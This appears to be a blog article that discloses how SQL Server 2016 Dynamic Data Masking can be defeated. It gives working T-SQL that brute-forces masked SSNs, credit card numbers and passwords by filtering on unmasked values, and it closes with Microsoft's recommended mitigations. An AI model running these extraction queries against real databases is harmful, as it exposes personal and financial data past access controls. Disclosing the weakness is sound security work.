Share via


SQL Server - Exposing masked data

Introduction

One of the new security features that SQL Server version 2016 brings, is DDM - Dynamic Data Masking. DDM is a solution that aims at real-time data masking of production data. DDM changes the data stream so that the data requester does not get full access to sensitive data, while no physical changes to the original production data take place.

Implementing DDM internally in SQL Server, aims to bring us better security, in the user level rules. One of the goals that embedded DDM supposed to bring, is that it's transparent to the client application. Users that gets security rules: SELECT, UPDATE, DELETE, INSERT able to work with the data freely, while keeping the masked rules. User not been granted permission "UNMASK", should not be able to expose the original value, if column configured to be masked. Is this actually works?!?

This blog shows how easy it is to expose the masked data, by any user, that has SELECT permission.

  The purpose of this blog is NOT to teach people how to expose the data, but to make people understand that the new feature does not brings us the security it should, and that we might expects to get according to the documentation. If you are using or intend to use this feature, then this blog is a must for you!

        

  This article based on a copy of the blog written by Ronen Ariely. The original blog includes several more issues regarding exposing data, which probably should not be exposed to users that have only SELECT permission, and several more advance cases. This article focuses only on exposing the basic masked data.


Preparation

Step 1: Let's create a new database, for the sake of our testing



      USE [master]  
      GO  
               
      DROP DATABASE  IF EXISTS [Ariely_DynamicMasking]
      CREATE DATABASE  [Ariely_DynamicMasking]
                    CONTAINMENT = NONE      
      GO  

Step 2: Let's create a new (database level) USER based on (Instance level) LOGIN, which is based on (Instance level) CREDENTIAL



      /****************************************************  */  
      /*********************************** SECURITY Elements */  
      /****************************************************  */  
      USE [master]  
      GO  
               
      /*    ------------------------------------------- CREDENTIAL */  
      if     not exists(select * from sys.credentials where name  = 'Ariely_MaskingCredential')
      BEGIN  
      CREATE CREDENTIAL Ariely_MaskingCredential
                    WITH IDENTITY = 'Ariely_MaskingIdentity',  
                    SECRET =       'StrongPasswordHere'      ;      
      END  
      GO  
               
      select * from sys.credentials
      GO  
               
      /*    ------------------------------------------- LOGIN */  
      if     not exists(select * from sys.server_principals where name  = 'Ariely_MaskingLogin')
      BEGIN  
      CREATE LOGIN Ariely_MaskingLogin
                   WITH PASSWORD  = 'Strong!Login@Password',  
                   CREDENTIAL = Ariely_MaskingCredential;      
      END  
      GO  
               
      SELECT * FROM sys.server_principals
      where name  = 'Ariely_MaskingLogin'
      GO  
               
      /*    ------------------------------------------- USER */  
      use [Ariely_DynamicMasking]  
      GO  
               
      if     not exists(select * from sys.database_principals where name  = 'Ariely_MaskingUser')
      BEGIN  
      CREATE USER Ariely_MaskingUser FOR  LOGIN Ariely_MaskingLogin
                    WITH DEFAULT_SCHEMA = dbo;  
      END  
      GO  
               
      SELECT * from sys.database_principals
      where name  = 'Ariely_MaskingUser'
      GO  

Step 3: Now we can create the table, which includes the data that we want to mask

Use [Ariely_DynamicMasking];
GO
   
/****************************************************  */
/********************************************* DDL+DML */
/****************************************************  */
   
-- Create table with different data type columns
DROP TABLE  IF EXISTS Ari_Users_Tbl
CREATE TABLE  Ari_Users_Tbl (
     UserID         INT             IDENTITY(1, 1) PRIMARY KEY
    ,F_Name         NVARCHAR(30)   NOT NULL
    ,L_Name         NVARCHAR(30)   NOT NULL
    -----------------------------------------
    ,SSN            INT             NOT NULL
    ,Password       NVARCHAR(12)   NOT NULL
    ,CreditCard     VARCHAR(20)    NULL
    ,Salary         MONEY          NULL
    ,Email          NVARCHAR(60)   NULL
    ,BirthDate      DATETIME       NULL
   
    ,CONSTRAINT CONSTRAINT_SSN UNIQUE(SSN)
)
GO
   
-- insert a row
INSERT INTO  [dbo].[Ari_Users_Tbl]
    ([F_Name],[L_Name], [Password], [SSN], [CreditCard], [Salary], [Email], [BirthDate])
VALUES
    ('Ronen','Ariely','sdFgs'  , 123456789, '1111-1234-1234-1111',999999,'Not@MyEmail.com'          , '20150227'),
    ('R'    ,'A'      ,'jkWlsUr', 987654321, '2222-1234-1234-2222',999999,'DefinitelyNot@MyEmail.com', '20160227')
GO
   
select * from dbo.Ari_Users_Tbl
GO

Image 1: SELECT result without masking

Step 4: implementing Masking using the new Dynamic Data Masking feature in SQL Server 2016

/****************************************************  */
/******************** implementing Masking in SQL 2016 */
/****************************************************  */
   
---------------------------------------------------------- Using "partial" function
ALTER TABLE  Ari_Users_Tbl ALTER  COLUMN [CreditCard]
        ADD MASKED WITH (FUNCTION = 'partial(0,"XXXX-XXXX-XXXX-",4)')
GO
---------------------------------------------------------- Using "email" function
ALTER TABLE  Ari_Users_Tbl ALTER  COLUMN [Email]
        ADD MASKED WITH (FUNCTION = 'email()')
GO
---------------------------------------------------------- Using "random" function
ALTER TABLE  Ari_Users_Tbl ALTER  COLUMN [SSN]
        ADD MASKED WITH (FUNCTION = 'random(111111111,999999999)')
GO
---------------------------------------------------------- Using "default" for string
ALTER TABLE  Ari_Users_Tbl ALTER  COLUMN [Password]
        ADD MASKED WITH (FUNCTION = 'default()')
GO
---------------------------------------------------------- Using "default" for MONEY
ALTER TABLE  Ari_Users_Tbl ALTER  COLUMN [Salary]
        ADD MASKED WITH (FUNCTION = 'default()')    
GO
---------------------------------------------------------- Using "default" on date
ALTER TABLE  Ari_Users_Tbl ALTER  COLUMN [BirthDate]
        ADD MASKED WITH (FUNCTION = 'default()')
GO
      Step 5:   GRANT Permissions to the user and check the masking

      /****************************************************  */  
      /***********************************     GRANT  Permissions */
      /****************************************************  */  
      GRANT SELECT  ON Ari_Users_Tbl TO Ariely_MaskingUser;
      GRANT INSERT  ON Ari_Users_Tbl TO Ariely_MaskingUser;
      GRANT UPDATE  ON Ari_Users_Tbl TO Ariely_MaskingUser;
      GO  
Let's see how it is working... Below code execute a simple SELECT query on the table, with impersonate to the new user. You can compare the result in Image 2 to to image 1 above.
/****************************************************  */
/**************************** Testing Masking SQL 2016 */
/****************************************************  */
/*------------------------------------------- MaskingUser user - SELECT */
-- Impersonate different user
EXECUTE AS  USER = 'Ariely_MaskingUser';
GO
  
SELECT USER_NAME(), SUSER_NAME()
GO
  
SELECT
    UserID,F_Name,L_Name,SSN,CreditCard,Email
    ,Password,Salary,BirthDate
FROM Ari_Users_Tbl;
GO
  
-- Stop impersonate
REVERT;
GO

Image 2: Execute SELECT as simple User


Expose the masked data, Step-By-Step

Our goal is to expose the masked data in order to get the full unmasked data. We will impersonate the user, which don't have permission to see the unmasked data, and we will try to exposes the data.

-- Execute this statement
-- Everything that we are going to do till the end during exposing of the masked data will be done by the new user
EXECUTE AS  USER = 'Ariely_MaskingUser';
GO

Please execute the above query, and let's start examine, how can we expose the data.

  History! You may find lot of posts/blogs online, which uses statements that exposed the data during the beta versions, but these are no longer working on the release version:

  • Using "SELECT INTO" or "INSERT INTO" in order to copy the unmasked data to another table.
  • Using sub-queries in the select section, or function to manipulate the data in the select section, in order to expose different data, which include part or all of the masked data.

        

We can use filter in order to select or update specific row(s), by comparing the value of the original masked column, as it is stored in the database (the unmasked value). This is a security breach!

-- Security breach!
UPDATE [dbo].[Ari_Users_Tbl]
    SET [CreditCard] = '3333-1234-1234-3333'
    WHERE [SSN] = 123456789 -- We can filter masked column, by comparing it's exposed value
GO
  
SELECT * FROM Ari_Users_Tbl;
GO

Goal 1: Find the [SSN] number for UserID = 1

The simplest case that we can think about is to find a number. The SSN is a simple integer number, and that will be great as our first example. Our goal is to find the SSN number for the user with userID = 1.

SELECT u.F_Name, u.L_Name,u.SSN
FROM Ari_Users_Tbl u
where u.UserID = 1
GO

If we add to the above query a filter on SSN, and that value will not be the user correct value, then we will not get any row back:

select u.F_Name, u.L_Name,u.SSN,u.CreditCard
from Ari_Users_Tbl U
where U.UserID = 1
    and SSN = 333333333 - This is not the correct SSN value
GO

But if we will use the correct SSN value of the user, then we will get the row back. This is the basic logic in the procedure to expose the value. We can simply phish the value. Theoretically, we can test any available value until we will get the correct SSN value (for example using loop).

-- Fishing (Phishing) the value!
select u.F_Name, u.L_Name,u.SSN,u.CreditCard
from Ari_Users_Tbl U
where U.UserID = 1
    and SSN = 123456789 -- This is the correct value, therefore the row will return
GO

Once we understand the basic idea, we can implement a simple query. We will use dynamic numbers table created in CTE, in order to expose the SSN for any user, very fast as you can see in the next query:

-- Dynamically Fishing (Phishing) the value!
Declare @UserId int = 1
;With MyCTE as (
    SELECT TOP  99999 ROW_NUMBER() OVER (ORDER BY  (select  NULL)) AS Number
    FROM sys.all_objects s1
    CROSS JOIN sys.all_objects s2
)
select u.F_Name, u.L_Name,u.SSN
    ,  CONVERT(NVARCHAR(MAX),Nf.Number) + CONVERT(NVARCHAR(MAX),N.Number) as  Real_SSN
from Ari_Users_Tbl U
LEFT JOIN MyCTE Nf  on  Nf.Number =  U.SSN / 10000 -- 5 first numbers
LEFT JOIN MyCTE N  on  N.Number =  U.SSN % 10000 -- 4 first numbers
where U.UserID = @UserId
GO


    

   Creating big number table dynamically might cost memory and CPU. For better performance, we create smaller number table, and expose the number in two steps. Firstly, we find the 5 first numbers and next the 4 last numbers, assuming that the number has 9 digits like in Israel.

     

Goal 2: Find the CreditCard number for UserID = 1

The basic logic is exactly like the previous section. A Credit Card number has a specific format, which make it very simple and fast to be exposed.

-- Dynamically Fishing the CreditCard!
Declare @UserId int = 1
;With MyCTE as (
    SELECT TOP  99999 ROW_NUMBER() OVER (ORDER BY  (select  NULL)) AS Number
    FROM sys.all_objects s1
    CROSS JOIN sys.all_objects s2
)
SELECT u.F_Name, u.L_Name,u.CreditCard
    ,CONVERT(NVARCHAR(MAX), N1.Number) + '-'  +
     CONVERT(NVARCHAR(MAX), N2.Number) + '-'  +
     CONVERT(NVARCHAR(MAX), N3.Number) + '-'  +
     CONVERT(NVARCHAR(MAX), N4.Number) as  Real_CreditCard
FROM Ari_Users_Tbl u
LEFT JOIN MyCTE N1  on  N1.Number =  CONVERT(INT,SUBSTRING(u.CreditCard,1,4))
LEFT JOIN MyCTE N2  on  N2.Number =  CONVERT(INT,SUBSTRING(u.CreditCard,6,4))
LEFT JOIN MyCTE N3  on  N3.Number =  CONVERT(INT,SUBSTRING(u.CreditCard,11,4))
LEFT JOIN MyCTE N4  on  N4.Number =  CONVERT(INT,SUBSTRING(u.CreditCard,16,4))
where U.UserID = @UserId
GO


  

Goal 3: Expose Free text like password column

The most complex case is when we need to find free text, which we have no information about it's format or anything else. For the sake of our demo, we will expose the user password. This option can be implemented on any textual value. In this section we will use specific logic based on three steps. You can find other algorithm, which might fit your case better. For more advance cases and exposing data which can help you, you can check the original blog.

* we can use temporary numbers table, instead of dynamically use Common Table Expressions. This allows us to create index on the table to improve performance (I reminds you that we are still using the new user, which has no special permissions!).

Preparation: Create temporary indexed table

DROP TABLE  IF EXISTS #NumbersTbl
SELECT TOP  10000 IDENTITY(int,1,1) AS  Number
INTO #NumbersTbl
FROM sys.all_objects s1
CROSS JOIN sys.all_objects s2
ALTER TABLE  #NumbersTbl ADD  CONSTRAINT PK_NumbersTbl PRIMARY KEY  CLUSTERED (Number)
GO

Step 1: Find the text length

select u.UserID,n.Number
from Ari_Users_Tbl u
JOIN #NumbersTbl n ON LEN(u.Password) = n.Number
WHERE UserID = 1
GO

Step 2: Find list of all the characters in the text

in the end of this step we will not know how many times each character used or the order of the characters, but we will know which characters include in the text.

For the sake of this article we assume that the password includes only English characters. Therefore, we filter the data between ASCII number 65 and 90, which is uppercase English chars, and between 97 to 122, which is the lowercase English chars. You can change the filter according to your needs (if needed you can search for any readable char).

DROP TABLE  IF EXISTS #QQ
SELECT * INTO #QQ
FROM (
    SELECT u.UserID,CHAR(n.Number) c
    from Ari_Users_Tbl u
    JOIN #NumbersTbl n
        on u.Password like '%' + CHAR(n.Number) + '%'
            COLLATE Hebrew_CS_AS -- Case sensitive Hebrew
    -- In our case the password can be only English latters
    where u.UserID = 1
        -- All English latters
        AND (
            (n.Number >= 65 and n.Number < 90)
            or (n.Number >= 97 and n.Number < 122)
        )
) T
GO
  
SELECT * FROM #QQ
GO

Step 3: Find the text

Using the information from step 1 and step 2 we can find the exact text. We already have the information about all the chars in the password and the length of the password. Now I will use this information to find the exact password.

  For the sake of the explanation I use the above information, manually. We can create one query that executes these three steps together, as one statement.

        

DECLARE @LEN INT = 1, @Pass NVARCHAR(MAX) = ''
WHILE @LEN <= 5 -- we found that the len is 5 in step 1
BEGIN
    SELECT @Pass = @Pass + c.c
    from #QQ c
    INNER JOIN Ari_Users_Tbl a on  SUBSTRING(a.Password,@LEN,1) = c.c
    where a.UserID = 1
  
    SET @LEN = @LEN + 1
END
select u.F_Name, u.L_Name,u.Password, @Pass as Real_Password
from Ari_Users_Tbl u
where u.UserID = 1
GO

Voila! we found the user password :-)


Comments & Conclusions

The built-in new feature is very powerful and it's brings great option to dynamically mask the data and manage the masked data, transparently to the client apps. It can save the developer lot of time and resources. It can even brings better security. Since the data is masked in the database level, it is less exposed to attacks like "Man-in-the-middle", but yet, it does not brings us security in the USER level! Any user that has SELECT permission can exposes the data, as we show in this article.

The main issue is that the filter done on the original unmasked data, instead of after masking the data on the masked data. In one side, this gives us the power to filter rows freely by using the masked columns, but in the other hand, this is a security breach! There is no reason that a user that not supposed to have any information regarding unmasked data, will have the option to filter by that value.

* What is the solution? We can use the new feature "as it is" and understand that it does not gives us security in the USER level, or we can go back to other solutions, which we use on older version. For example, implementing Dynamic Data Masking by building security layer in the database level. This option gives great security, but cost lot of developing time!


From the Microsoft SQL Data Security team:

   Do not edit this paragraph!!

This section is a quote from an email sent as a feedback to the original blog, by the SQL Data Security team, for the sake of the readers.

        

Thanks Ronen for writing about one of our new SQL data security features, Dynamic Data Masking.

As you stated, Dynamic Data Masking is a new and powerful feature built-in to SQL Server 2016 and Azure SQL DB. It enables developers to easily and centrally obfuscate sensitive information in their applications. This can save a lot of time and effort of limiting exposure to data in the application layer. It can also be used to help prevent accidental exposure to engineers connecting directly to the production database for specific purposes. Dynamic Data Masking is very easy to configure for specific sensitive data fields, and is transparent to the application.

It is also important to clarify, as you do in your blog, that while Dynamic Data Masking can help secure your applications, is not a full security solution for blocking access to sensitive data – specifically in the case where users have direct access to the database and can run ad-hoc queries. It is intended to limit exposure of sensitive data and centralize the policy, but the data can be disclosed by malicious intent using brute force techniques when evaluating this feature in isolation.

In fact, Dynamic Data Masking is one tool in an arsenal of security features offered by SQL, which complement each other to provide state-of-the-art security for your database. As in any defense strategy, we recommend using a combination of these built-in capabilities in order to protect your data.

For the examples you demonstrate in your blog, we highly recommend enabling Auditing to track database activity, defining proper permissions models and using an encryption feature like Always Encrypted to protect the most highly classified sensitive data.

Please take a look at this overview of SQL security capabilities to learn more about our recommended best practices for data security.

SQL Data Security team,


Resources and more information